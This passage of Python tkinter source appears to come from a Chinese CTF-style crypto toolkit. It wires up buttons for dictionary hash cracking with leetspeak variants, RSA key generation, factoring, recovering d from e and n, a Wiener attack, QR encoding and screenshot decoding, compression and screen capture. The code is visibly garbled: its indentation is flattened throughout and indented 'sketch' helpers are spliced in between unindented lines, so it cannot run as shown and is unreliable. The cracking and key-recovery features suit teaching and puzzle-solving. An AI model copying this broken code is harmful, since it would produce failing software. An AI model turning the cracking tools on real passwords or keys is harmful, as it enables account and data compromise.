fevpkdf0 = Frame(ff1)
fevpkdf0.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fevpkdf0, text=fevpkdflab,font=ft).pack(fill=tkinter.X,expand=True)
fevpkdf1 = Frame(ff1)
fevpkdf1.pack(side=tkinter.TOP,fill=tkinter.X)
fevpkdf2 = Frame(fevpkdf1)
fevpkdf2.pack(side=tkinter.TOP,fill=tkinter.X)
def _evpkdf_code(*a):
try:
from . import pyevpkdf
except:
import pyevpkdf
ctxt.delete(0.,tkinter.END)
with open(pyevpkdf.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fevpkdf2, text='[算法]',command=_evpkdf_code,width=5).pack(side=tkinter.RIGHT)
_fss1 = Frame(fr)
enb.add(_fss1, text='爆破;RSA;二维码')
enb.pack()
enb_names[_fss1._name] = '爆破;RSA;二维码'
fss1 = Frame(_fss1)
fss1.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
fss1_ = Frame(_fss1)
fss1_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
txttitlefss = Frame(fss1_)
txttitlefss.pack(side=tkinter.TOP)
Label(txttitlefss, text='使用以下文本框进行输出').pack(side=tkinter.LEFT,padx=10)
fssentlimit2 = Entry(txttitlefss, width=10)
fssentlimit2.pack(side=tkinter.LEFT)
fssentlimit2.insert(0,'10000')
fsstxt = Text(fss1_,font=ft)
fsstxt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
bhashhelp = '''
hash 爆破
该算法会自动使用一定程度的黑客语(leetspeak)对密码进行膨胀处理,详细的处理请参考算法。
若想使用自己的字典,可以直接将字典内容粘贴到右侧窗口中,点击[自定义爆破]即可
会自动使用选择的算法进行 hash 的对比。
另外,算法内还有名字前缀以及日期的组合,没有放在该功能中,如果有更详细的需求
请直接点开算法,使用别的ide进行更丰富的爆破处理。
'''.rstrip('\n')
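    # Illustrative sketch of the "leetspeak expansion + hash compare" idea described above.
    # The real expansion lives in pymapmd5.mk_map_passleet; this stdlib-only helper
    # (_sketch_leet_variants) only substitutes a few common characters and is an assumption.
    def _sketch_leet_variants(word):
        import itertools
        table = {'a': 'a@4', 'e': 'e3', 'i': 'i1!', 'o': 'o0', 's': 's5$'}
        pools = [table.get(c.lower(), c) for c in word]
        for combo in itertools.product(*pools):
            yield ''.join(combo)
    # usage sketch:
    #   any(hashlib.md5(w.encode()).hexdigest() == target_hash for w in _sketch_leet_variants('password'))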
    # Length counter for the hash input field in the brute-force section below.
def fbx_change_cbit_1(*content):
if content:
blen = len(content[0])
fbx_cbit1['text'] = str(blen)
return True
fbx_change_cbit1 = root.register(fbx_change_cbit_1)
fbx100 = Frame(fss1)
fbx100.pack(side=tkinter.TOP,fill=tkinter.X)
fbx101 = Frame(fbx100)
fbx102 = Frame(fbx100)
fbx103 = Frame(fbx100)
fbx101.pack(side=tkinter.TOP,fill=tkinter.X)
fbx102.pack(side=tkinter.TOP,fill=tkinter.X)
fbx103.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fbx101, text=bhashhelp, font=ft).pack(fill=tkinter.X,expand=True)
def _pymapmd5_decode(*a):
_hash = fbxent.get().strip()
_mode = fbx1_mode1.get()
fsstxt.delete(0.,tkinter.END)
try:
from . import pymapmd5, pymd2
except:
import pymapmd5, pymd2
try:
if _mode == 'md2':
hfunc = pymd2.md2
else:
hfunc = lambda i:hashlib.new(_mode, i).hexdigest()
emptyhash = hfunc(b'')
if len(_hash) != len(emptyhash):
print('非法的hash长度')
print(_mode,'需要的长度为',len(emptyhash))
return
if _hash == emptyhash:
print('空参数的hash。')
return
ctime = time.time()
mk_map_passleet = pymapmd5.mk_map_passleet
zpasslist = mk_map_passleet(pymapmd5.zpasslist)
map_namehead_times = pymapmd5.map_namehead_times
findkey = False
for i in itertools.chain(zpasslist, map_namehead_times()):
v = hfunc(i.encode())
if v == _hash:
findkey = (v, i)
break
if findkey:
print('发现密码:')
print('password:',i)
print('hash:',v)
else:
print('未找到密码')
print('使用时间:',time.time()-ctime)
except:
fsstxt.delete(0.,tkinter.END)
print(traceback.format_exc())
def _inputdict_map(*a):
_hash = fbxent.get().strip()
_mode = fbx1_mode1.get()
_list = fsstxt.get(0.,tkinter.END).strip('\n').splitlines()
fsstxt.delete(0.,tkinter.END)
try:
from . import pymapmd5, pymd2
except:
import pymapmd5, pymd2
try:
if _mode == 'md2':
hfunc = pymd2.md2
else:
hfunc = lambda i:hashlib.new(_mode, i).hexdigest()
emptyhash = hfunc(b'')
mk_map_passleet = pymapmd5.mk_map_passleet
if len(_hash) != len(emptyhash):
print('非法的hash长度')
print(_mode,'需要的长度为',len(emptyhash))
return
if _hash == emptyhash:
print('空参数的hash。')
return
ctime = time.time()
findkey = False
for i in mk_map_passleet(_list):
v = hfunc(i.encode())
if v == _hash:
findkey = (v, i)
break
if findkey:
print('发现密码:')
print('password:',i)
print('hash:',v)
else:
print('未找到密码')
print('使用时间:',time.time()-ctime)
except:
fsstxt.delete(0.,tkinter.END)
print(traceback.format_exc())
def _pymapmd5_code(*a):
try:
from . import pymapmd5
except:
import pymapmd5
fsstxt.delete(0.,tkinter.END)
with open(pymapmd5.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Label(fbx102, text='参数',width=4).pack(side=tkinter.LEFT,padx=5)
fbxent = Entry(fbx102, width=41,validate='key',validatecommand=(fbx_change_cbit1, '%P'))
fbxent.pack(side=tkinter.LEFT)
fbxent.bind('<Key>', fbx_change_cbit1)
# fbxent.pack(side=tkinter.LEFT)
fbx1_mode1 = Combobox(fbx102,width=12,state='readonly')
fbx1_mode1['values'] = ['md5', 'sha1', 'blake2b', 'blake2s', 'md2', 'md4', 'ripemd160', 'sha', \
'sha224', 'sha256', 'sha384', 'sha3_224', 'sha3_256', 'sha3_384', \
'sha3_512', 'sha512', 'whirlpool']
fbx1_mode1.current(0)
fbx1_mode1.pack(side=tkinter.RIGHT)
fbx_cbit1 = Label(fbx102, text='0',width=4)
fbx_cbit1.pack(side=tkinter.LEFT,padx=5)
Label(fbx102, text='hash',width=4).pack(side=tkinter.RIGHT,padx=5)
Button(fbx103, text='[算法]',command=_pymapmd5_code,width=5).pack(side=tkinter.RIGHT)
Button(fbx103, text='快速爆破',command=_pymapmd5_decode,width=8).pack(side=tkinter.RIGHT)
Button(fbx103, text='自定义爆破',command=_inputdict_map,width=10).pack(side=tkinter.RIGHT)
sshelp = '''
一些关于素数的内容
以下一开始就在输入框的的内容均是测试内容
e=65537=0x10001 是常用的的 rsa 加密标准的通用初始值,
如果有需要自定义,请自行填入一个素数
'''.strip('\n')
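    # Illustrative sketch of textbook RSA key generation with e=65537, matching the note above.
    # The bundled pyprime module does the real work; this toy uses two small well-known primes
    # (the 10,000th and 100,000th primes) and raw pow(), so it is for demonstration only.
    def _sketch_toy_rsa():
        p, q = 104729, 1299709            # both prime; far too small for real security
        n, phi = p * q, (p - 1) * (q - 1)
        e = 65537
        d = pow(e, -1, phi)               # modular inverse (Python 3.8+)
        m = 42                            # toy plaintext, must be < n
        c = pow(m, e, n)                  # encrypt with the public key (e, n)
        assert pow(c, d, n) == m          # decrypt with the private key (d, n)
        return (e, n), (d, n)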
fss001 = Frame(fss1)
fss001.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss001, text=sshelp,font=ft).pack(fill=tkinter.X,expand=True)
def css002(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
try:
num = int(ess002.get())
if num > 1030:
print('目前不支持生成超过 1030bit 位的素数。')
return
en = str(pyprime.get_prime(num))
print(en)
except:
print(traceback.format_exc())
fss002 = Frame(fss1)
fss002.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss002,text='bit位',font=ft,width=6).pack(side=tkinter.LEFT)
ess002 = Entry(fss002,width=40)
ess002.pack(side=tkinter.LEFT)
ess002.insert(0, '30')
bss002 = Button(fss002,text='生成 n bit位素数',command=css002)
bss002.pack(side=tkinter.LEFT,padx=2)
def css002_1(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
try:
num = int(ess002_1.get())
if pyprime.isprime_mr(num):
print('{} 是素数。'.format(num))
else:
print('{} 不是素数。'.format(num))
except:
print(traceback.format_exc())
fss002_1 = Frame(fss1)
fss002_1.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss002_1,text='数字',font=ft,width=6).pack(side=tkinter.LEFT)
ess002_1 = Entry(fss002_1,width=40)
ess002_1.pack(side=tkinter.LEFT)
ess002_1.insert(0, '30')
bss002_1 = Button(fss002_1,text='素性检测',command=css002_1)
bss002_1.pack(side=tkinter.LEFT,padx=2)
def css003(*a):
fsstxt.delete(0.,tkinter.END)
try:
print(hex(int(ess003.get()))[2:].upper())
except:
print(traceback.format_exc())
fss003 = Frame(fss1)
fss003.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss003,text='数字',font=ft,width=6).pack(side=tkinter.LEFT)
ess003 = Entry(fss003,width=40)
ess003.pack(side=tkinter.LEFT)
ess003.insert(0, '123456789012345678901234567890')
bss003 = Button(fss003,text='数字转字符串',command=css003)
bss003.pack(side=tkinter.LEFT,padx=2)
def css004(*a):
fsstxt.delete(0.,tkinter.END)
try:
print(int(ess004.get(),16))
except:
print(traceback.format_exc())
fss004 = Frame(fss1)
fss004.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss004,text='字符串',font=ft,width=6).pack(side=tkinter.LEFT)
ess004 = Entry(fss004,width=40)
ess004.pack(side=tkinter.LEFT)
ess004.insert(0, '16704F4FAB27EC51A071C71C7')
bss004 = Button(fss004,text='字符串转数字',command=css004)
bss004.pack(side=tkinter.LEFT,padx=2)
def css005(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
try:
num = int(ess005.get())
if not pyprime.isprime_mr(num):
print('e 必须是一个素数。')
return
num2 = int(ess005_2.get())
if num2 > 2050:
print('当前的密钥 n bit长度不能超过2050.')
return
e,d,n = pyprime.create_rsa_key(num2, num)
ess006.delete(0,tkinter.END)
ess006.insert(0,str(n))
ess007.delete(0,tkinter.END)
ess007.insert(0,str(d))
print('e:',e)
print('d:',d)
print('n:',n)
print()
print('密钥n bit位长度:',len(bin(n)[2:]))
print('e,n 就是公钥')
print('d,n 就是私钥')
except:
print(traceback.format_exc())
fss005 = Frame(fss1)
fss005.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss005,text='e',font=ft,width=6).pack(side=tkinter.LEFT)
ess005 = Entry(fss005,width=40)
ess005.pack(side=tkinter.LEFT)
ess005.insert(0,'65537')
bss005 = Button(fss005,text='生成rsa密钥对,密钥n的bit位:',command=css005)
bss005.pack(side=tkinter.LEFT,padx=2)
ess005_2 = Entry(fss005,width=5)
ess005_2.pack(side=tkinter.LEFT)
ess005_2.insert(0,'1024')
def css006(*a):
try:
from . import pyprime
except:
import pyprime
try:
dataint = int(fsstxt.get(0.,tkinter.END))
fsstxt.delete(0.,tkinter.END)
e = int(ess005.get())
n = int(ess006.get())
print(pow(dataint, e, n))
except:
print(traceback.format_exc())
fss006 = Frame(fss1)
fss006.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss006,text='n',font=ft,width=6).pack(side=tkinter.LEFT)
ess006 = Entry(fss006,width=40)
ess006.pack(side=tkinter.LEFT)
bss006 = Button(fss006,text='使用e,n对右侧数字进行rsa加密',command=css006)
bss006.pack(side=tkinter.LEFT,padx=2)
def css007(*a):
try:
from . import pyprime
except:
import pyprime
try:
dataint = int(fsstxt.get(0.,tkinter.END))
fsstxt.delete(0.,tkinter.END)
d = int(ess007.get())
n = int(ess006.get())
print(pow(dataint, d, n))
except:
print(traceback.format_exc())
fss007 = Frame(fss1)
fss007.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss007,text='d',font=ft,width=6).pack(side=tkinter.LEFT)
ess007 = Entry(fss007,width=40)
ess007.pack(side=tkinter.LEFT)
bss007 = Button(fss007,text='使用d,n对右侧数字进行rsa解密',command=css007)
bss007.pack(side=tkinter.LEFT,padx=2)
def css009(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
try:
num = int(ess009.get())
plist = pyprime.prime_list_rho(num)
print(plist)
r = 1
for i in plist:
r *= i
print('原始数据:',num)
print('验算结果:',str(r))
except:
print(traceback.format_exc())
fss009 = Frame(fss1)
fss009.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss009,text='数字',font=ft,width=6).pack(side=tkinter.LEFT)
ess009 = Entry(fss009,width=40)
ess009.pack(side=tkinter.LEFT)
bss009 = Button(fss009,text='质因数分解',command=css009)
bss009.pack(side=tkinter.LEFT,padx=2)
def css0014(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
try:
e = int(ess005.get())
n = int(ess006.get())
print('注意:p,q 中的最小值的 bit 长度应大约小于40(经验判断),否则程序卡死。')
fsstxt.update()
d, p, q = pyprime.get_d_from_e_n(e, n)
print('p:',p)
print('q:',q)
print()
print('计算结果d:', d)
ess007.delete(0,tkinter.END)
ess007.insert(0,str(d))
except:
print(traceback.format_exc())
fss0014 = Frame(fss1)
fss0014.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss0014,text='n因式分解条件:n==p*q; min(p,q)的bit长度大约在40或更小,否则程序卡死',font=ft).pack(side=tkinter.LEFT)
bss0014 = Button(fss0014,text='通过e,n直接解出参数d',command=css0014)
bss0014.pack(side=tkinter.RIGHT,padx=2)
def css008(*a):
try:
from . import pywiener_attack
except:
import pywiener_attack
fsstxt.delete(0.,tkinter.END)
try:
e = int(ess005.get())
n = int(ess006.get())
v = str(pywiener_attack.wiener_attack(e, n))
if v.startswith('Error'):
print('使用的e参数:',e)
print('使用的n参数:',n)
print()
print('wiener attack 算法攻击未成功。')
else:
print('使用的e参数:',e)
print('使用的n参数:',n)
print()
print('wiener attack 算法攻击成功。')
print('算出的 d 参数为:',v)
except:
print(traceback.format_exc())
fss008 = Frame(fss1)
fss008.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss008,text='当e很大,且d很小,这时可通过 wiener-attack 算法用e,n解密出d',font=ft).pack(side=tkinter.LEFT)
bss008 = Button(fss008,text='使用e,n进行算法攻击',command=css008)
bss008.pack(side=tkinter.RIGHT,padx=2)
def _pyprime_code(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
with open(pyprime.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _pywiener_attck_code(*a):
try:
from . import pywiener_attack
except:
import pywiener_attack
fsstxt.delete(0.,tkinter.END)
with open(pywiener_attack.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
fss0010 = Frame(fss1)
fss0010.pack(side=tkinter.TOP,fill=tkinter.X)
bss0010 = Button(fss0010,text='素数与rsa相关算法',command=_pyprime_code)
bss0010.pack(side=tkinter.RIGHT,padx=2)
bss0010_2 = Button(fss0010,text='wiener-attack算法',command=_pywiener_attck_code)
bss0010_2.pack(side=tkinter.RIGHT,padx=2)
sshelp = '''
关于二维码的加解密
解密:
使用解密时,需要将图片打开,解密功能会自动将桌面截图,
也可以直接使用截图解密,这样可以更加精准的定位数据。
當然,你可以选择使用脚本进行自定义的处理。
加密:
在加密中中文的加密有时会因为zbar的问题解码成无意义的日文或乱码。
请确认解码的正常后再使用加密的二维码,
解决方式可以尝试微调一下加密数据。
'''.strip('\n')
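    # Illustrative sketch (an assumption, not the bundled pyqrcode module): rendering an ASCII
    # QR code with the third-party `qrcode` package, which exposes a similar QRCode API.
    def _sketch_ascii_qr(text):
        import qrcode
        qr = qrcode.QRCode(error_correction=qrcode.constants.ERROR_CORRECT_M)
        qr.add_data(text)
        qr.make(fit=True)
        return '\n'.join(''.join('██' if cell else '  ' for cell in row)
                         for row in qr.get_matrix())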
fss0011 = Frame(fss1)
fss0011.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss0011, text=sshelp,font=ft).pack(fill=tkinter.X,expand=True)
def css0012(*a):
try:
from . import pypyzbar
except:
import pypyzbar
fsstxt.delete(0.,tkinter.END)
try:
screenshot_bit = pypyzbar.screenshot()
pixbytes, w, h = pypyzbar.create_png_pixel_tobytes(screenshot_bit)
deco = pypyzbar.decode((pixbytes, w, h))
print(time.ctime())
print('开始识别')
if deco:
print('发现{}个二维码并解密:'.format(len(deco)))
print(' <注意:含有中文解密若是在解码中出现乱码问题则该bytes类型数据就已经不可信了>')
for idx,i in enumerate(deco):
print('[ {} ]'.format(idx))
print(' bytes类型展示')
print(' ',i.data)
print(' 尝试简单解码')
try:
print(' ',i.data.decode('utf-8'))
except:
print(' ',i.data.decode('gbk'))
else:
print('未定位到二维码。')
print('识别结束')
except:
print(traceback.format_exc())
def css0012_1(*a):
try:
from . import pypyzbar
except:
import pypyzbar
try:
pixbytes, w, h = pypyzbar.screenshot_rect(root)
deco = pypyzbar.decode((pixbytes, w, h))
fsstxt.delete(0.,tkinter.END)
print(time.ctime())
print('开始识别')
if deco:
print('发现{}个二维码并解密:'.format(len(deco)))
print(' <注意:含有中文解密若是在解码中出现问题则该bytes类型数据就已经不可信了>')
for idx,i in enumerate(deco):
print('[ {} ]'.format(idx))
print(' bytes类型展示')
print(' ',i.data)
print(' 尝试简单解码')
try:
print(' ',i.data.decode('utf-8'))
except:
print(' ',i.data.decode('gbk'))
else:
print('未定位到二维码。')
print('识别结束')
except:
print(traceback.format_exc())
def css0013(*a):
try:
from . import pyqrcode
except:
import pyqrcode
fsstxt.delete(0.,tkinter.END)
try:
enctxt = ess0012.get().strip()
encdlv = cbx_0013.get().strip()
if encdlv == '7%': encdlv = pyqrcode.ERROR_CORRECT_L
if encdlv == '15%': encdlv = pyqrcode.ERROR_CORRECT_M
if encdlv == '25%': encdlv = pyqrcode.ERROR_CORRECT_Q
if encdlv == '30%': encdlv = pyqrcode.ERROR_CORRECT_H
s = pyqrcode.QRCode(error_correction=encdlv)
s.add_data(enctxt.encode('utf-8'))
for i in s.get_matrix():
black = '██'
white = ' '
v = ''.join([black if j else white for j in i])
print(v)
except:
print(traceback.format_exc())
fss0012 = Frame(fss1)
fss0012.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss0012,text='加密',font=ft,width=6).pack(side=tkinter.LEFT)
ess0012 = Entry(fss0012,width=50)
ess0012.pack(side=tkinter.LEFT)
fss0013 = Frame(fss1)
fss0013.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss0013,text='等级',font=ft,width=6).pack(side=tkinter.LEFT)
cbx_0013 = Combobox(fss0013,width=6,state='readonly')
cbx_0013['values'] = ['7%', '15%', '25%', '30%']
cbx_0013.current(1)
cbx_0013.pack(side=tkinter.LEFT)
bss0013_3 = Button(fss0013,text='截图解密',command=css0012_1,width=9)
bss0013_3.pack(side=tkinter.RIGHT,padx=1)
bss0013_2 = Button(fss0013,text='全屏解密',command=css0012,width=9)
bss0013_2.pack(side=tkinter.RIGHT,padx=1)
bss0013 = Button(fss0013,text='二维码加密',command=css0013,width=9)
bss0013.pack(side=tkinter.RIGHT,padx=1)
def _pyqrcode_code(*a):
try:
from . import pyqrcode
except:
import pyqrcode
fsstxt.delete(0.,tkinter.END)
with open(pyqrcode.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _pypyzbar_code(*a):
try:
from . import pypyzbar
except:
import pypyzbar
fsstxt.delete(0.,tkinter.END)
with open(pypyzbar.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _donate_code(*a):
try:
from . import pyqrcode
except:
import pyqrcode
fsstxt.delete(0.,tkinter.END)
try:
encdlv = pyqrcode.ERROR_CORRECT_L
print('支付宝扫码赞助:')
enctxt = 'HTTPS://QR.ALIPAY.COM/FKX07500WBJ0OXZUXJLUCF'
s = pyqrcode.QRCode(error_correction=encdlv)
s.add_data(enctxt.encode('utf-8'))
for i in s.get_matrix()[3:]:
black = '██'
white = ' '
v = ''.join([black if j else white for j in i])
print(v)
print('微信扫码赞助:')
enctxt = 'wxp://f2f0xF3d1egb-YtPxHm0AZHw0gdJByCgZeLz'
s = pyqrcode.QRCode(error_correction=encdlv)
s.add_data(enctxt.encode('utf-8'))
for i in s.get_matrix()[3:]:
black = '██'
white = ' '
v = ''.join([black if j else white for j in i])
print(v)
except:
print(traceback.format_exc())
style = ttk.Style()
style.map("TEST.TButton",
foreground=[('!focus', '#EE6363')],
)
bss0013_5 = Button(fss0013,text='赞助作者',command=_donate_code,width=7,style='TEST.TButton')
bss0013_5.pack(side=tkinter.LEFT)
bss0013_4 = Button(fss0013,text='加密[算法]',command=_pyqrcode_code,width=9)
bss0013_4.pack(side=tkinter.LEFT)
bss0013_3 = Button(fss0013,text='解密[算法]',command=_pypyzbar_code,width=9)
bss0013_3.pack(side=tkinter.LEFT)
zfcys = r'''
字符串或二进制的简单压缩,嵌入代码
使用有边框进行字符串的压缩处理并输出代码化的脚本
便于让二进制数据能更好更快的嵌入脚本之中(下面压缩算法均为py自带)
'''.strip('\n')
zfcys = '\n' + zfcys
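    # Illustrative sketch of the "compress + base64 + wrap into an embeddable snippet" idea
    # described above. The real formatting lives in pycompress; the helper name
    # _sketch_embed_string is hypothetical and only the standard library is used.
    def _sketch_embed_string(text, width=70):
        import base64, zlib, textwrap
        payload = base64.b64encode(zlib.compress(text.encode('utf-8'))).decode('ascii')
        body = '\n'.join("    '{}'".format(line) for line in textwrap.wrap(payload, width))
        return ('zstring = (\n' + body + '\n)\n'
                'import base64, zlib\n'
                "string = zlib.decompress(base64.b64decode(zstring)).decode('utf-8')\n")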
fss0015 = Frame(fss1)
fss0015.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss0015, text=zfcys, font=ft).pack(fill=tkinter.X,expand=True)
def _zipstring(*a):
try:
from . import pycompress
except:
import pycompress
w = int(eny0015.get())
b = cbx0015_1.get()
z = cbx0015_2.get()
e = cbx0015_3.get()
f = ibx0015.get()
string = fsstxt.get(0.,tkinter.END).strip('\n')
if f:
v = pycompress.format_compress_file(b, z, w, e)
else:
v = pycompress.format_compress_string(string, b, z, w, e)
fsstxt.delete(0.,tkinter.END)
print(v)
Label(fss0015, text='脚本宽度', font=ft).pack(side=tkinter.LEFT)
eny0015 = Entry(fss0015,width=4)
eny0015.pack(side=tkinter.LEFT)
eny0015.insert(0,'70')
Label(fss0015, text='base模式', font=ft).pack(side=tkinter.LEFT)
cbx0015_1 = Combobox(fss0015,width=6,state='readonly')
cbx0015_1['values'] = ['base64', 'base85']
cbx0015_1.pack(side=tkinter.LEFT)
cbx0015_1.current(0)
Label(fss0015, text='压缩方式', font=ft).pack(side=tkinter.LEFT)
cbx0015_2 = Combobox(fss0015,width=4,state='readonly')
cbx0015_2['values'] = ['zlib', 'lzma', 'gzip', 'None']
cbx0015_2.pack(side=tkinter.LEFT)
cbx0015_2.current(0)
Label(fss0015, text='编码', font=ft).pack(side=tkinter.LEFT)
cbx0015_3 = Combobox(fss0015,width=6,state='readonly')
cbx0015_3['values'] = ['utf-8', 'gbk']
cbx0015_3.pack(side=tkinter.LEFT)
cbx0015_3.current(0)
ibx0015 = tkinter.IntVar()
kbx0015 = Checkbutton(fss0015,text='压缩文件', variable=ibx0015, width=6)
kbx0015.pack(side=tkinter.LEFT)
bss0015_1 = Button(fss0015,text='开始压缩',command=_zipstring, width=9)
bss0015_1.pack(side=tkinter.RIGHT)
_fpic = Frame(fr)
enb.add(_fpic, text='图片相关')
enb.pack()
enb_names[_fpic._name] = '图片相关'
fpic1 = Frame(_fpic)
fpic1.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
fpic1_ = Frame(_fpic)
fpic1_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
txttitlefpic = Frame(fpic1_)
txttitlefpic.pack(side=tkinter.TOP)
Label(txttitlefpic, text='使用以下文本框进行输出').pack(side=tkinter.LEFT,padx=10)
fpicentlimit2 = Entry(txttitlefpic, width=10)
fpicentlimit2.pack(side=tkinter.LEFT)
fpicentlimit2.insert(0,'10000')
fpictxt = Text(fpic1_,font=ft)
fpictxt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
fpic0010 = Frame(fpic1)
fpic0010.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0012 = Frame(fpic0010)
fpic0012.pack(side=tkinter.TOP,fill=tkinter.X)
def _find_desktop_gif(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pyfinddesktopfile
from . import pygif
except:
import pyfinddesktopfile
import pygif
try:
finddesktop = pyfinddesktopfile.finddesktop
findfile_desktop = pyfinddesktopfile.findfile_desktop
SimpleDialog = pyfinddesktopfile.SimpleDialog
gifs = findfile_desktop('gif')
d = finddesktop()
s = SimpleDialog(fr,buttons=gifs)
v = os.path.join(d, gifs[s.go()])
print('为了提高压缩率,gif图片格式增加了一些透明通道,')
print('所以一些图片出现白色脏点是正常的。')
print('正在解析图片...')
fpictxt.update()
phlist = pygif.mk_phlist(v)
for i in phlist:
fpictxt.image_create(tkinter.END, image=i)
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _pygif_code(*a):
try:
from . import pygif
except:
import pygif
fpictxt.delete(0.,tkinter.END)
with open(pygif.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
pichelp1 = '''图片相关的处理部分'''
Label(fpic0012, text=pichelp1).pack(side=tkinter.TOP,padx=10)
Button(fpic0012, text='[算法]',command=_pygif_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0012, text=' 这里为 gif 图片切分显示。').pack(side=tkinter.LEFT)
Button(fpic0012, text='从桌面获取gif解析',command=_find_desktop_gif,width=16).pack(side=tkinter.RIGHT)
fpic0020 = Frame(fpic1)
fpic0020.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0022 = Frame(fpic0020)
fpic0022.pack(side=tkinter.TOP,fill=tkinter.X)
def _pyscreenshot(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pyfinddesktopfile
from . import pyscreenshot
except:
import pyfinddesktopfile
import pyscreenshot
try:
finddesktop = pyfinddesktopfile.finddesktop
screenshot_rect = pyscreenshot.screenshot_rect
dfile = os.path.join(finddesktop(), fpic002ent.get().strip())
bitpng = screenshot_rect(root)
with open(dfile, 'wb') as f:
f.write(bitpng)
print('write in:{}'.format(dfile))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _pyscreenshot_code(*a):
try:
from . import pyscreenshot
except:
import pyscreenshot
fpictxt.delete(0.,tkinter.END)
with open(pyscreenshot.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fpic0022, text='[算法]',command=_pyscreenshot_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0022, text=' 截图并存放到桌面,文件名字:').pack(side=tkinter.LEFT)
fpic002ent = Entry(fpic0022,width=10)
fpic002ent.pack(side=tkinter.LEFT)
fpic002ent.insert(0,'_temp.png')
Button(fpic0022, text='截图存放至桌面',command=_pyscreenshot,width=16).pack(side=tkinter.RIGHT)
fpic0030 = Frame(fpic1)
fpic0030.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0032 = Frame(fpic0030)
fpic0032.pack(side=tkinter.TOP,fill=tkinter.X)
def _pyscreenshot_video_local(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pyfinddesktopfile
from . import pyscreenshot
except:
import pyfinddesktopfile
import pyscreenshot
try:
finddesktop = pyfinddesktopfile.finddesktop
screenshot_rect_int = pyscreenshot.screenshot_rect_int
dfile = os.path.join(finddesktop(), fpic003ent.get().strip())
left,top,w,h = screenshot_rect_int(root)
fpic003ent1.delete(0,tkinter.END)
fpic003ent2.delete(0,tkinter.END)
fpic003ent3.delete(0,tkinter.END)
fpic003ent4.delete(0,tkinter.END)
fpic003ent1.insert(0,str(left))
fpic003ent2.insert(0,str(top))
fpic003ent3.insert(0,str(w))
fpic003ent4.insert(0,str(h))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
fpic003toggle = True
def _pyscreenshot_video(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pyfinddesktopfile
from . import pyscreenshot
except:
import pyfinddesktopfile
import pyscreenshot
try:
finddesktop = pyfinddesktopfile.finddesktop
_start_video = pyscreenshot._start_video
_stop_video = pyscreenshot._stop_video
nonlocal fpic003toggle
if fpic003toggle:
fpic003btn1['text'] = '录制图片[已开启]'
fpic003toggle = False
try:
left = int(fpic003ent1.get().strip())
top = int(fpic003ent2.get().strip())
w = int(fpic003ent3.get().strip())
h = int(fpic003ent4.get().strip())
rect = (left,top,w,h)
except:
print('error left,top,w,h. use fill desktop.')
rect = pyscreenshot.desktop_ltwh()
_start_video(finddesktop(), rect, fpic003ent.get().strip(), print)
elif not fpic003toggle:
fpic003btn1['text'] = '录制图片[已关闭]'
fpic003toggle = True
_stop_video()
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _pyscreenshot_video_code(*a):
try:
from . import pyscreenshot
except:
import pyscreenshot
fpictxt.delete(0.,tkinter.END)
with open(pyscreenshot.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fpic0032, text='[算法]',command=_pyscreenshot_video_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0032, text=' 文件夹:').pack(side=tkinter.LEFT)
fpic003ent = Entry(fpic0032,width=6)
fpic003ent.pack(side=tkinter.LEFT)
